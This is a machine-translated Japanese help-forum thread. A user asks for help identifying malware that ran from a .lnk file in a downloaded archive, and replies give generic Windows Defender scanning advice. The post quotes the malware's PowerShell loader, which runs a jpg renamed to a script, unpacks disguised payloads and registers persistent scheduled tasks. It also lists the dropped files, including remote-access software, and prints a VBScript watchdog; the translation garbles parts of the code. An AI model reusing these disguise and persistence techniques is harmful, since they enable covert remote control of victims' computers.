マルウェアを特定し、完全に削除されたかどうかを確認するのに役立ちます
Windows 10(ホーム)を実行している父のラップトップが安全であることを確認しようとしています.父は1つの.rarファイルに多数のPDFをダウンロードしたいと考えていました.抽出すると、いくつかの.jpgファイルとCollection.lnkファイルが含まれていました.彼は次のことを実行した.lnkファイルをクリックしました:
(イベントビューアによって記録されたとおり)
...
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-nologo-ExecutionPolicy Unrestricted-command rename-item cover.jpg c.ps1;
.\c.ps1
...
これは(上記を理解できる限り)jpgの1つを名前変更し、そのコンテンツを実行しました:
attrib + s + h Collection.lnk
tar-xzvf cover6.jpg
tar-xzvf cover4.jpg-CC:\Users\Public\
tar-xzvf cover5.jpg-CC:\Users\Public\
$ a= New-ScheduledTaskAction-Execute "C:\Users\Public\MicrosoftEdger\MicrosoftOut.exe"
$ tr= New-ScheduledTaskTrigger-Daily-At(get-date).AddMinutes(6).ToString( "HH:mm")
$ option= New-ScheduledTaskSettingsSet-AllowStartIfOnBatteries-ExecutionTimeLimit 0
$ t= Register-ScheduledTask-TaskName "MicrosoftEdge1"-Trigger $ tr-Action $ a-Settings $ option
$ t.Triggers.Repetition.Duration= 'P7300D'
$ t.Triggers.Repetition.Interval= 'PT30M'
$ t|Set-ScheduledTask
$ a= $ env:APPDATA
$ taskExists= Get-ScheduledTask|Where-Object {$ _.TaskName-like'MicrosoftEdge1 '}
$ a= New-ScheduledTaskAction-Execute "C:\Users\Public\onedriver\Runer.vbs"
$ tr= New-ScheduledTaskTrigger-Daily-At(get-date).AddMinutes(3).ToString( "HH:mm")
$ option= New-ScheduledTaskSettingsSet-AllowStartIfOnBatteries-ExecutionTimeLimit 0
$ t= Register-ScheduledTask-TaskName "onedriver"-Trigger $ tr-Action $ a-Settings $ option
$ t.Triggers.Repetition.Duration= 'P7300D'
$ t.Triggers.Repetition.Interval= 'PT30M'
$ t|Set-ScheduledTask
$ a= $ env:APPDATA
タスクスケジューラで両方のタスクとそれらが参照するフォルダを手動で削除しました(これらはcover4とcover5のコンテンツから抽出されました
(私が知る限り、cover6.jpgにはPDFだけが含まれています)
cover4には、MicrosoftEdgerフォルダーが含まれています:(括弧内のファイル詳細情報)
bz2.pyd
gcapi.dll
mfc90.dll
MicrosoftAn.exe(AnyDesk)
MicrosoftOut.exe(Softonic)
nircmd.exe
python27.dll
pythoncom27.dll
pyWintypes27.dll
select.pyd
unicodedata.pyd
Win32api.pyd
Win32ui.pyd
_hashlib.pyd
_socket.pyd
_Win32sysloader.pyd
およびcover5-onedriver-with:
data.exe
onedriver.exe
Runer.vbs
Runer.vbs:
オプションの明示
DIM strcomputer、strProcess
strcomputer= "." 'ローカルコンピュータ
strProcess= "onedriver.exe"
薄暗いoShell
oShell= WScript.CreateObject( "WSCript.shell")を設定します
'電卓が指定されたコンピューター(.=ローカルコンピューター)で実行されているかどうかを確認します
IF isProcessRunning(strcomputer、strProcess)THEN
a= 0
その他
oShell.Run "C:\Users\Public\onedriver\onedriver.exe"、1、true
oShell= Nothing
を設定しますEND IF
'プロセスが実行されているかどうかを確認する関数
関数isProcessRunning(BYVAL strcomputer、BYVAL strProcessName)
DIM objWMIService、strWMIQuery
strWMIQuery= "Select* from Win32_Process where name like '"&strProcessName&"'"
SET objWMIService= GETOBJECT( "Winmgmts:" _
&"{impersonationLevel= impersonate} !\\"_
&strcomputer&"\root\cimv2")
IF objWMIService.ExecQuery(strWMIQuery).Count>0 THEN
isProcessRunning= TRUE
その他
isProcessRunning= FALSE
END IF
終了機能
誰かがこれを特定し、私がすべてを削除したかどうか、および/またはどのような害があった可能性があるかを確認するための良い解決策を見つけるのを手伝ってくれることを願っています.無料のMalwarebytesが問題を報告せず、40以上の脅威を検出した後、Microsoft Safety Scanner(クイックScan+ユーザーディレクトリ)を実行しましたが、最後のレポートにはリストされているだけです
「削除済み」として.それ以外の場合、コンピューターは正常に機能しているようです.
返信リスト(回答:3)
基本的に、Windows Defenderまたはマルウェア対策を無効にして、さらに悪いことをしようとするウイルス.
私が理解できるように、チェックの後、すべてがきれいで、すべてが大丈夫ですか?
ありがたいことに、
クロードワール
こんにちは、私の名前はClaudeirです.ユーザーであり、独立したコンサルタントです.コミュニティへようこそ.お役に立てれば幸いです.
-私はあなたを理解しています、そして何かが期待どおりに機能しないとき、それがどれほどイライラする可能性があるかを知っています:
すでにこれらのチェックを行っている場合は、リラックスしてすべてが正常であることを確認するために、次のようなチェックを行ってください.
-Windows Defenderによる検証:
サードパーティのマルウェア対策をアンインストールします.多くのウイルス対策ソフトウェアには独自の駆除ツールがあります.詳細については、インストール済みソフトウェアのWebサイトにアクセスしてください.Windowsには、コンピュータを再起動するとすぐに自動的に有効になる独自のセキュリティシステムがあるため、システムの保護が解除されることはありません.
Windows Defender、次にWindows + iだけを残し、&セキュリティ、Windowsセキュリティを更新し、Windowsセキュリティ、ウイルスと脅威の保護を開き、オプションをScanし、フルScanにチェックマークを付けて実行し、次にオフラインScanにチェックマークを付けて実行します.
回答が何らかの形で役に立った場合は、サービスを継続できるように、意見を残すか、回答済みとしてマークするか、詳細を残すことを検討してください.これは私たちにとって非常に重要です.
心から、
クロードワール
応答3# ->にスキップ2 #krzysieこれについてご連絡いただきありがとうございます
これまでのところ、Windows DefenderScanは問題を報告しておらず、私はそれが正しいと信じている可能性があります.この脅威について詳しく知り、作成したタスクとファイルを削除する前に脅威が及ぼした可能性のある悪意のある影響を理解したいと思います.